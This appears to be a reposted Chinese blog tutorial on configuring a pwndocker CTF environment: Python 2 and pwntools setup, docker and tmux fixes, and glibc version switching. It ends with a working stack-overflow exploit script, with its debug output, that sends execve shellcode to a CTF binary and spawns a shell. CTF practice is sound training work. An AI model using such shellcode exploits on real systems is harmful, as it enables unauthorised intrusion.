從零開始配置pwn環(huán)境：優(yōu)化pwndocker配置

這篇具有很好參考價(jià)值的文章主要介紹了從零開始配置pwn環(huán)境：優(yōu)化pwndocker配置。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方，請(qǐng)大家不吝賜教，您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

1.研究背景

從零開始配置kali2023環(huán)境：配置pwn調(diào)試環(huán)境-CSDN博客

前期安裝好pwndocker后發(fā)現(xiàn)不好用，所以通過(guò)研究修改一些配置后可以滿足解題需要

2.遇到的問(wèn)題并解決

1.docker環(huán)境pwndocker里面沒(méi)有python2環(huán)境，pwn的題目解答很多需要python2的環(huán)境，需要補(bǔ)充完善

docker環(huán)境pwndocker里面安裝python2環(huán)境

                                                                             ┌──(holyeyes
                                                                             
┌──(holyeyes?kali2023)-[~/Re]
└─$ cd 2 
                                                                             
                         
┌──(holyeyes?kali2023)-[~/Re/2]
└─$ sudo docker exec -it pwn_test /bin/bash
[sudo] password for holyeyes: 
root@446f4b4dbc7d:/ctf/work# ls
2  wdb_2018_2nd_easyfmt
root@446f4b4dbc7d:/ctf/work# python2 get-pip.py

root@446f4b4dbc7d:/ctf/work#  curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--       6 1863k    6  127k    0     0   182k      0  0:00:10 --:--:--  0:00:10  181 90 1863k   90 1694k    0     0   996k      0  0:00:01  0:00:01 --:--:--  996100 1863k  100 1863k    0     0  1026k      0  0:00:01  0:00:01 --:--:-- 1026k
root@446f4b4dbc7d:/ctf/work# ls
2  get-pip.py  wdb_2018_2nd_easyfmt
root@446f4b4dbc7d:/ctf/work# python2 get-pip.pyDEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.                                                                            
Looking in indexes: http://pypi.tuna.tsinghua.edu.cn/simple
Collecting pip<21.0
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/27/79/8a850fe3496446ff0d584327ae44e7500daf6764ca1a382d2d02789accf7/pip-20.3.4-py2.py3-none-any.whl (1.5 MB)
     |████████████████████████████████| 1.5 MB 1.2 MB/s 
Collecting setuptools<45
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/e1/b7/182161210a13158cd3ccc41ee19aadef54496b74f2817cc147006ec932b4/setuptools-44.1.1-py2.py3-none-any.whl (583 kB)
     |████████████████████████████████| 583 kB 37.3 MB/s 
Collecting wheel
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/27/d6/003e593296a85fd6ed616ed962795b2f87709c3eee2bca4f6d0fe55c6d00/wheel-0.37.1-py2.py3-none-any.whl (35 kB)
Installing collected packages: pip, setuptools, wheel
Successfully installed pip-20.3.4 setuptools-44.1.1 wheel-0.37.1
root@446f4b4dbc7d:/ctf/work# sudo apt install python2-pip
bash: sudo: command not found
root@446f4b4dbc7d:/ctf/work# apt install python2-pip
Reading package lists... Done
Building dependency tree       
Reading state information... Done
E: Unable to locate package python2-pip
root@446f4b4dbc7d:/ctf/work# apt-get install python-dev
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Note, selecting 'python-dev-is-python2' instead of 'python-dev'
The following additional packages will be installed:
  libpython2-dev libpython2.7 libpython2.7-dev python-is-python2
  python2-dev python2.7-dev
The following NEW packages will be installed:
  libpython2-dev libpython2.7 libpython2.7-dev python-dev-is-python2
  python-is-python2 python2-dev python2.7-dev
0 upgraded, 7 newly installed, 0 to remove and 89 not upgraded.
Need to get 3,809 kB of archives.
After this operation, 17.7 MB of additional disk space will be used.
Do you want to continue? [Y/n] 
Get:1 http://archive.ubuntu.com/ubuntu focal-updates/universe amd64 libpython2.7 amd64 2.7.18-1~20.04.3 [1,037 kB]
Get:2 http://archive.ubuntu.com/ubuntu focal-updates/universe amd64 libpython2.7-dev amd64 2.7.18-1~20.04.3 [2,466 kB]
Get:3 http://archive.ubuntu.com/ubuntu focal/universe amd64 libpython2-dev amd64 2.7.17-2ubuntu4 [7,140 B]
Get:4 http://archive.ubuntu.com/ubuntu focal/universe amd64 python-is-python2 all 2.7.17-4 [2,496 B]
Get:5 http://archive.ubuntu.com/ubuntu focal-updates/universe amd64 python2.7-dev amd64 2.7.18-1~20.04.3 [293 kB]
Get:6 http://archive.ubuntu.com/ubuntu focal/universe amd64 python2-dev amd64 2.7.17-2ubuntu4 [1,268 B]
Get:7 http://archive.ubuntu.com/ubuntu focal/universe amd64 python-dev-is-python2 all 2.7.17-4 [1,396 B]
Fetched 3,809 kB in 4s (862 kB/s)           
Selecting previously unselected package libpython2.7:amd64.
(Reading database ... 56821 files and directories currently installed.)
Preparing to unpack .../0-libpython2.7_2.7.18-1~20.04.3_amd64.deb ...
Unpacking libpython2.7:amd64 (2.7.18-1~20.04.3) ...
Selecting previously unselected package libpython2.7-dev:amd64.
Preparing to unpack .../1-libpython2.7-dev_2.7.18-1~20.04.3_amd64.deb ...
Unpacking libpython2.7-dev:amd64 (2.7.18-1~20.04.3) ...
Selecting previously unselected package libpython2-dev:amd64.
Preparing to unpack .../2-libpython2-dev_2.7.17-2ubuntu4_amd64.deb ...
Unpacking libpython2-dev:amd64 (2.7.17-2ubuntu4) ...
Selecting previously unselected package python-is-python2.
Preparing to unpack .../3-python-is-python2_2.7.17-4_all.deb ...
Unpacking python-is-python2 (2.7.17-4) ...
Selecting previously unselected package python2.7-dev.
Preparing to unpack .../4-python2.7-dev_2.7.18-1~20.04.3_amd64.deb ...
Unpacking python2.7-dev (2.7.18-1~20.04.3) ...
Selecting previously unselected package python2-dev.
Preparing to unpack .../5-python2-dev_2.7.17-2ubuntu4_amd64.deb ...
Unpacking python2-dev (2.7.17-2ubuntu4) ...
Selecting previously unselected package python-dev-is-python2.
Preparing to unpack .../6-python-dev-is-python2_2.7.17-4_all.deb ...
Unpacking python-dev-is-python2 (2.7.17-4) ...
Setting up libpython2.7:amd64 (2.7.18-1~20.04.3) ...
Setting up libpython2.7-dev:amd64 (2.7.18-1~20.04.3) ...
Setting up libpython2-dev:amd64 (2.7.17-2ubuntu4) ...
Setting up python-is-python2 (2.7.17-4) ...
Setting up python2.7-dev (2.7.18-1~20.04.3) ...
Setting up python2-dev (2.7.17-2ubuntu4) ...
Setting up python-dev-is-python2 (2.7.17-4) ...
Processing triggers for libc-bin (2.31-0ubuntu9.7) ...
root@446f4b4dbc7d:/ctf/work# pip2 install setuptools
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.                                                                            
Looking in indexes: http://pypi.tuna.tsinghua.edu.cn/simple
Requirement already satisfied: setuptools in /usr/local/lib/python2.7/dist-packages (44.1.1)
root@446f4b4dbc7d:/ctf/work# pip2 install pwntools
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.                                                                            
Looking in indexes: http://pypi.tuna.tsinghua.edu.cn/simple
Collecting pwntools
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/e6/4a/95e9e203abc5945507caf2a9706a4c0478f9fd9fd5b7001cb68cfe1564e7/pwntools-4.11.1-py2.py3-none-any.whl (11.7 MB)
     |████████████████████████████████| 11.7 MB 897 kB/s 
Collecting psutil>=3.3.0
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/cd/ee/d946d0b758120e724d9cdd9607c304ff1eedb9380bf60597c295dc7def6b/psutil-5.9.7-cp27-cp27mu-manylinux2010_x86_64.whl (312 kB)
     |████████████████████████████████| 312 kB 37.8 MB/s 
Requirement already satisfied: pip>=6.0.8 in /usr/local/lib/python2.7/dist-packages (from pwntools) (20.3.4)
Collecting python-dateutil
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/36/7a/87837f39d0296e723bb9b62bbb257d0355c7f6128853c78955f57342a56d/python_dateutil-2.8.2-py2.py3-none-any.whl (247 kB)
     |████████████████████████████████| 247 kB 46.5 MB/s 
Collecting sortedcontainers
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/32/46/9cb0e58b2deb7f82b84065f37f3bffeb12413f947f9388e4cac22c4621ce/sortedcontainers-2.4.0-py2.py3-none-any.whl (29 kB)
Collecting mako>=1.0.0
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/b4/4d/e03d08f16ee10e688bde9016bc80af8b78c7f36a8b37c7194da48f72207e/Mako-1.1.6-py2.py3-none-any.whl (75 kB)
     |████████████████████████████████| 75 kB 3.9 MB/s 
Collecting requests>=2.0
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/2d/61/08076519c80041bc0ffa1a8af0cbd3bf3e2b62af10435d269a9d0f40564d/requests-2.27.1-py2.py3-none-any.whl (63 kB)
     |████████████████████████████████| 63 kB 3.6 MB/s 
Collecting colored-traceback
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/68/95/d9b20efe099fff830502c6c7b83da4f1cdfd3346922d87da9bca3e63f897/colored_traceback-0.3.0-py2-none-any.whl (6.7 kB)
Collecting paramiko>=1.15.2
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/71/6d/95777fd66507106d2f8f81d005255c237187951644f85a5bd0baeec8a88f/paramiko-2.12.0-py2.py3-none-any.whl (213 kB)
     |████████████████████████████████| 213 kB 32.2 MB/s 
Collecting six>=1.12.0
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/d9/5a/e7c31adbe875f2abbb91bd84cf2dc52d792b5a01506781dbcf25c91daf11/six-1.16.0-py2.py3-none-any.whl (11 kB)
Collecting unicorn>=1.0.2rc1
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/32/3d/93adc91f390ac12a96b4d01270421410f1ed054d22e9f716cb0169ae5634/unicorn-2.0.1.post1-py2.py3-none-manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl (16.1 MB)
     |████████████████████████████████| 16.1 MB 24.7 MB/s 
Collecting ropgadget>=5.3
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/a9/59/997946f620e5f402165d0d2f955356e24499bc4d4d5f93b5c04221022681/ROPGadget-7.4-py2-none-any.whl (32 kB)
Collecting capstone>=3.0.5rc2
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/7a/fe/e6cdc4ad6e0d9603fa662d1ccba6301c0cb762a1c90a42c7146a538c24e9/capstone-5.0.1.tar.gz (2.9 MB)
     |████████████████████████████████| 2.9 MB 23.4 MB/s 
Collecting intervaltree>=3.0
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/50/fb/396d568039d21344639db96d940d40eb62befe704ef849b27949ded5c3bb/intervaltree-3.1.0.tar.gz (32 kB)
Collecting pyelftools<0.30,>=0.24; python_version < "3"
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/04/7c/867630e6e6293793f838b31034aa1875e1c3bd8c1ec34a0929a2506f350c/pyelftools-0.29-py2.py3-none-any.whl (174 kB)
     |████████████████████████████████| 174 kB 15.3 MB/s 
Collecting pathlib2; python_version < "3.4"
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/09/eb/4af4bcd5b8731366b676192675221c5324394a580dfae469d498313b5c4a/pathlib2-2.3.7.post1-py2.py3-none-any.whl (18 kB)
Collecting pysocks
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/a2/4b/52123768624ae28d84c97515dd96c9958888e8c2d8f122074e31e2be878c/PySocks-1.7.1-py27-none-any.whl (16 kB)
Collecting rpyc
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/36/a7/7898de583e17202ce02ac7ecffdbed95c72a6cebe468c1ee6fc94fc20933/rpyc-4.1.5-py2-none-any.whl (68 kB)
     |████████████████████████████████| 68 kB 11.8 MB/s 
Collecting pyserial>=2.7
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/07/bc/587a445451b253b285629263eb51c2d8e9bcea4fc97826266d186f96f558/pyserial-3.5-py2.py3-none-any.whl (90 kB)
     |████████████████████████████████| 90 kB 15.6 MB/s 
Collecting packaging
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/3e/89/7ea760b4daa42653ece2380531c90f64788d979110a2ab51049d92f408af/packaging-20.9-py2.py3-none-any.whl (40 kB)
     |████████████████████████████████| 40 kB 8.8 MB/s 
Collecting pygments>=2.0
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/be/39/32da3184734730c0e4d3fa3b2b5872104668ad6dc1b5a73d8e477e5fe967/Pygments-2.5.2-py2.py3-none-any.whl (896 kB)
     |████████████████████████████████| 896 kB 18.5 MB/s 
Collecting MarkupSafe>=0.9.2
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/fb/40/f3adb7cf24a8012813c5edb20329eb22d5d8e2a0ecf73d21d6b85865da11/MarkupSafe-1.1.1-cp27-cp27mu-manylinux1_x86_64.whl (24 kB)
Collecting idna<3,>=2.5; python_version < "3"
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/a2/38/928ddce2273eaa564f6f50de919327bf3a00f091b5baba8dfa9460f3a8a8/idna-2.10-py2.py3-none-any.whl (58 kB)
     |████████████████████████████████| 58 kB 11.4 MB/s 
Collecting certifi>=2017.4.17
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/37/45/946c02767aabb873146011e665728b680884cd8fe70dde973c640e45b775/certifi-2021.10.8-py2.py3-none-any.whl (149 kB)
     |████████████████████████████████| 149 kB 45.9 MB/s 
Collecting chardet<5,>=3.0.2; python_version < "3"
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/19/c7/fa589626997dd07bd87d9269342ccb74b1720384a4d739a1872bd84fbe68/chardet-4.0.0-py2.py3-none-any.whl (178 kB)
     |████████████████████████████████| 178 kB 46.6 MB/s 
Collecting urllib3<1.27,>=1.21.1
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/b0/53/aa91e163dcfd1e5b82d8a890ecf13314e3e149c05270cc644581f77f17fd/urllib3-1.26.18-py2.py3-none-any.whl (143 kB)
     |████████████████████████████████| 143 kB 28.5 MB/s 
Collecting pynacl>=1.0.1
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/de/63/bb36279da38df643c6df3a8a389f29a6ff4a8854468f4c9b9d925b27d57d/PyNaCl-1.4.0-cp27-cp27mu-manylinux1_x86_64.whl (964 kB)
     |████████████████████████████████| 964 kB 26.7 MB/s 
Collecting bcrypt>=3.1.3
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/ad/36/9a0227d048e98409f012570f7bef8a8c2373b9c9c5dfbf82963cbae05ede/bcrypt-3.1.7-cp27-cp27mu-manylinux1_x86_64.whl (59 kB)
     |████████████████████████████████| 59 kB 8.9 MB/s 
Collecting cryptography>=2.5
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/bf/a0/c630e9e3b7e7ea2492db1ca47ef7f741ef1a09f19c6642ef1a16ce996d9b/cryptography-3.3.2-cp27-cp27mu-manylinux2010_x86_64.whl (2.6 MB)
     |████████████████████████████████| 2.6 MB 22.1 MB/s 
Collecting scandir; python_version < "3.5"
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/df/f5/9c052db7bd54d0cbf1bc0bb6554362bba1012d03e5888950a4f5c5dadc4e/scandir-1.10.0.tar.gz (33 kB)
Collecting typing; python_version < "3.5"
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/0b/cb/da856e81731833b94da70a08712f658416266a5fb2a9d9e426c8061becef/typing-3.10.0.0-py2-none-any.whl (26 kB)
Collecting plumbum
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/f5/7f/4e93e5e1c13261966ea553cb4368599902e4fbf6f7dcad3ec16695a45718/plumbum-1.7.2-py2.py3-none-any.whl (117 kB)
     |████████████████████████████████| 117 kB 45.5 MB/s 
Collecting pyparsing>=2.0.2
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/8a/bb/488841f56197b13700afd5658fc279a2025a39e22449b7cf29864669b15d/pyparsing-2.4.7-py2.py3-none-any.whl (67 kB)
     |████████████████████████████████| 67 kB 9.4 MB/s 
Collecting cffi>=1.4.1
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/a4/42/54bdf22cf6c8f95113af645d0bd7be7f9358ea5c2d57d634bb11c6b4d0b2/cffi-1.15.1-cp27-cp27mu-manylinux1_x86_64.whl (390 kB)
     |████████████████████████████████| 390 kB 27.5 MB/s 
Collecting enum34; python_version < "3"
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/6f/2c/a9386903ece2ea85e9807e0e062174dc26fdce8b05f216d00491be29fad5/enum34-1.1.10-py2-none-any.whl (11 kB)
Collecting ipaddress; python_version < "3"
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/c2/f8/49697181b1651d8347d24c095ce46c7346c37335ddc7d255833e7cde674d/ipaddress-1.0.23-py2.py3-none-any.whl (18 kB)
Collecting pycparser
  Downloading https://pypi.tuna.tsinghua.edu.cn/packages/62/d5/5f610ebe421e85889f2e55e33b7f9a6795bd982198517d912eb1c76e1a53/pycparser-2.21-py2.py3-none-any.whl (118 kB)
     |████████████████████████████████| 118 kB 40.4 MB/s 
Building wheels for collected packages: capstone, intervaltree, scandir
  Building wheel for capstone (setup.py) ... done
  Created wheel for capstone: filename=capstone-5.0.1-py2-none-manylinux1_x86_64.whl size=2933815 sha256=17d9f762956464878ba6ba16c0c3cf14d31cd2dda65773daa32340321631014b
  Stored in directory: /root/.cache/pip/wheels/30/d5/0e/284d552f462834b854509c0d15597b69dca3d95f68db330d0f
  Building wheel for intervaltree (setup.py) ... done
  Created wheel for intervaltree: filename=intervaltree-3.1.0-py2.py3-none-any.whl size=26103 sha256=da488f680c7f6b388c2551e34f2167f9f18476387d6b7a3443b97f2a11e84fc3
  Stored in directory: /root/.cache/pip/wheels/c3/b7/91/90ec6643bcb930bfd8079718cfb5763283af00a9726463dd1d
  Building wheel for scandir (setup.py) ... done
  Created wheel for scandir: filename=scandir-1.10.0-cp27-cp27mu-linux_x86_64.whl size=34188 sha256=3d6a2c1d10c9e05c8e2273bb0e7c3843371c8d2582c32211d66f0a2872dcdbe6
  Stored in directory: /root/.cache/pip/wheels/94/dc/52/ea6c1d7960b7267b32bc59b3625afb5840bd86ddbf18d7f1cf
Successfully built capstone intervaltree scandir
Installing collected packages: psutil, six, python-dateutil, sortedcontainers, MarkupSafe, mako, idna, certifi, chardet, urllib3, requests, pygments, colored-traceback, pycparser, cffi, pynacl, bcrypt, enum34, ipaddress, cryptography, paramiko, unicorn, capstone, ropgadget, intervaltree, pyelftools, scandir, typing, pathlib2, pysocks, plumbum, rpyc, pyserial, pyparsing, packaging, pwntools
Successfully installed MarkupSafe-1.1.1 bcrypt-3.1.7 capstone-5.0.1 certifi-2021.10.8 cffi-1.15.1 chardet-4.0.0 colored-traceback-0.3.0 cryptography-3.3.2 enum34-1.1.10 idna-2.10 intervaltree-3.1.0 ipaddress-1.0.23 mako-1.1.6 packaging-20.9 paramiko-2.12.0 pathlib2-2.3.7.post1 plumbum-1.7.2 psutil-5.9.7 pwntools-4.11.1 pycparser-2.21 pyelftools-0.29 pygments-2.5.2 pynacl-1.4.0 pyparsing-2.4.7 pyserial-3.5 pysocks-1.7.1 python-dateutil-2.8.2 requests-2.27.1 ropgadget-7.4 rpyc-4.1.5 scandir-1.10.0 six-1.16.0 sortedcontainers-2.4.0 typing-3.10.0.0 unicorn-2.0.1.post1 urllib3-1.26.18

保存安裝好的pwndocker環(huán)境為鏡像?

┌──(holyeyes?kali2023)-[~]
└─$  sudo docker  ps 
[sudo] password for holyeyes: 
CONTAINER ID   IMAGE                COMMAND           CREATED       STATUS       PORTS                                           NAMES
446f4b4dbc7d   skysider/pwndocker   "/sbin/my_init"   7 hours ago   Up 7 hours   0.0.0.0:23946->23946/tcp, :::23946->23946/tcp   pwn_test
                                                                             
┌──(holyeyes?kali2023)-[~]
└─$ sudo docker commit 446f4b4dbc7d pwn_test:v1

┌──(holyeyes?kali2023)-[~]
└─$ sudo docker image ls                         
REPOSITORY             TAG       IMAGE ID       CREATED        SIZE
pwn_test               v1        202c1a800e25   5 hours ago    5.25GB
skysider/pwndocker     latest    26c0315bd8d9   2 months ago   5GB
keen4n/pwndocker1604   latest    4ff3687f7371   4 years ago    2.52GB

?更新docker-compose.yml

version: '3'
services:
    pwn:
        container_name: pwn_test1604
        image: pwn_test
        security_opt:
            - seccomp:unconfined
        cap_add:
            - SYS_PTRACE
        ports:
            - "23947:23947"
        volumes:
            - /home/holyeyes/Re:/ctf/work

?更新run.sh

docker-compose up -d
docker exec -it pwn_test1604 /bin/bash

──(holyeyes?kali2023)-[~/pwndocker1604]
└─$ sudo ./run.sh
[sudo] password for holyeyes:?
Pulling pwn (pwn_test:)...
ERROR: The image for the service you're trying to recreate has been removed. If you continue, volume data could be lost. Consider backing up your data before continuing.

Continue with the new image? [yN]

但上述實(shí)驗(yàn)失敗了，只能用其他方法保存環(huán)境了

2.tmux環(huán)境配置不生效

左右分屏 ctrl+B+%

上下分屏ctrl+B+”

激活鼠標(biāo)ctrl+B+：set -g mouse on

搞半天都不行，原來(lái)是在虛機(jī)中ctrl換成alt，即：

左右分屏 alt+B+%

從零開始配置pwn環(huán)境：優(yōu)化pwndocker配置,KALI環(huán)境集成CTF工具,網(wǎng)絡(luò)安全,安全,系統(tǒng)安全,安全架構(gòu)

上下分屏alt+B+”

激活鼠標(biāo)alt+B+：set --g mouse on

從零開始配置pwn環(huán)境：優(yōu)化pwndocker配置,KALI環(huán)境集成CTF工具,網(wǎng)絡(luò)安全,安全,系統(tǒng)安全,安全架構(gòu)

3.docker默認(rèn)的libc環(huán)境是20.04，需要換成16.04

from pwn import *

p = process(["/glibc/2.23/64/lib/ld-2.23.so", "./test"], env={"LD_PRELOAD":"/glibc/2.23/64/lib/libc.so.6"})

參考pwndocker的使用說(shuō)明https://github.com/skysider/pwndocker

included glibc
Default compiled glibc path is /glibc.

2.19 —— ubuntu 12.04 default libc version
2.23 —— ubuntu 16.04 default libc version
2.24 —— introduce vtable check in file struct
2.27 —— ubuntu 18.04 default glibc version
2.31 —— ubuntu 20.04 default glibc version(built-in)
2.282.30,2.332.36 —— latest libc versions
Q&A
How to run in custom libc version?
cp /glibc/2.27/64/lib/ld-2.27.so /tmp/ld-2.27.so
patchelf --set-interpreter /tmp/ld-2.27.so ./test
LD_PRELOAD=./libc.so.6 ./test
or

from pwn import *
p = process(["/path/to/ld.so", "./test"], env={"LD_PRELOAD":"/path/to/libc.so.6"})

編寫了一個(gè)pwn腳本進(jìn)行測(cè)試
?文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-834902.html

from pwn import *

p = process(["/glibc/2.23/64/lib/ld-2.23.so", "./test"], env={"LD_PRELOAD":"/glibc/2.23/64/lib/libc.so.6"})

p = process('./wdb_2018_3rd_soEasy')
#p = remote('node5.buuoj.cn',27285)
context.log_level='debug'
context.arch='i386'

p.recvuntil('->')
buf = int(p.recvuntil('\n', drop=True),16)
log.info('buf:'+hex(buf))

p.recvuntil('what do you want to do?')

shellcode = asm(shellcraft.sh())
print len(shellcode)

pl = ''
pl += shellcode
pl += (76-len(pl))*'a'
pl += p32(buf)

p.sendline(pl)

p.interactive()

┌──(holyeyes?kali2023)-[~]
└─$ sudo docker exec -it pwn_test /bin/bash
[sudo] password for holyeyes: 
root@446f4b4dbc7d:/ctf/work# cd 2
root@446f4b4dbc7d:/ctf/work/2# ls
exp.py  get-pip.py  wdb_2018_3rd_soEasy
root@446f4b4dbc7d:/ctf/work/2# python2 exp.py 
[+] Starting local process '/glibc/2.23/64/lib/ld-2.23.so': pid 1051
[+] Starting local process './wdb_2018_3rd_soEasy': pid 1053
[DEBUG] Received 0x38 bytes:
    'Hei,give you a gift->0xffeaf870\n'
    'what do you want to do?\n'
[*] buf:0xffeaf870
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/includes /dev/stdin
[DEBUG] Assembling
    .section .shellcode,"awx"
    .global _start
    .global __start
    _start:
    __start:
    .intel_syntax noprefix
    .p2align 0
        /* execve(path='/bin///sh', argv=['sh'], envp=0) */
        /* push '/bin///sh\x00' */
        push 0x68
        push 0x732f2f2f
        push 0x6e69622f
        mov ebx, esp
        /* push argument array ['sh\x00'] */
        /* push 'sh\x00\x00' */
        push 0x1010101
        xor dword ptr [esp], 0x1016972
        xor ecx, ecx
        push ecx /* null terminate */
        push 4
        pop ecx
        add ecx, esp
        push ecx /* 'sh\x00' */
        mov ecx, esp
        xor edx, edx
        /* call execve() */
        push 11 /* 0xb */
        pop eax
        int 0x80
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-sp9wDe/step2 /tmp/pwn-asm-sp9wDe/step1
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-sp9wDe/step3 /tmp/pwn-asm-sp9wDe/step4
44
[DEBUG] Sent 0x51 bytes:
    00000000  6a 68 68 2f  2f 2f 73 68  2f 62 69 6e  89 e3 68 01  │jhh/│//sh│/bin│··h·│
    00000010  01 01 01 81  34 24 72 69  01 01 31 c9  51 6a 04 59  │····│4$ri│··1·│Qj·Y│
    00000020  01 e1 51 89  e1 31 d2 6a  0b 58 cd 80  61 61 61 61  │··Q·│·1·j│·X··│aaaa│
    00000030  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    00000040  61 61 61 61  61 61 61 61  61 61 61 61  70 f8 ea ff  │aaaa│aaaa│aaaa│p···│
    00000050  0a                                                  │·│
    00000051
[*] Switching to interactive mode

$

到了這里，關(guān)于從零開始配置pwn環(huán)境：優(yōu)化pwndocker配置的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！